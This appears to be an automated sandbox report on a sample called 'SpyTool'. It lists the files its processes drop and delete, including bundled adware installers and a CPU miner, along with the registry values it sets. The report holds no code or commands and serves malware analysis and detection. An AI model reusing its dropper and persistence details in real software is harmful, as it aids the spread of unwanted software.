%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\amazon.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\chrome.packed.7z (1312726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\skype.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_translate.ico (1592 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3 (0 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (0 bytes)

The process nsx36.tmp:1468 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (15 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (0 bytes)

The process encrypt.exe:1060 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (92311 bytes)

The process encrypt.exe:1476 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (24230 bytes)

The process encrypt.exe:1100 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (1447 bytes)

The process encrypt.exe:1584 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (31996 bytes)

The process nsx1C.tmp:1896 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1F.tmp (8776 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (0 bytes)

The process nsx1C.tmp:1088 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso22.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (14 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (0 bytes)

The process nst25.tmp:1804 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj28.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (784 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (0 bytes)

The process nso3D.tmp:3724 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\blowfish.dll (22 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3F.tmp (0 bytes)

The process nsk6.tmp:204 makes changes in the file system.


The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw8.tmp (0 bytes)

The process %original file name%.exe:1736 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\policyname[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\vos[1].htm (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso3D.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx46.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup_gmsd_re[1].exe (365499 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz16.tmp (0 bytes)

Registry activity

The process upgmsd_re_005010096.exe:1276 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "F855B05B-E99A-467D-A5E5-45A5C22EF132"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 B4 06 0A 8D 74 E3 01 4A AE E9 9B 9A 3E 79 A4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

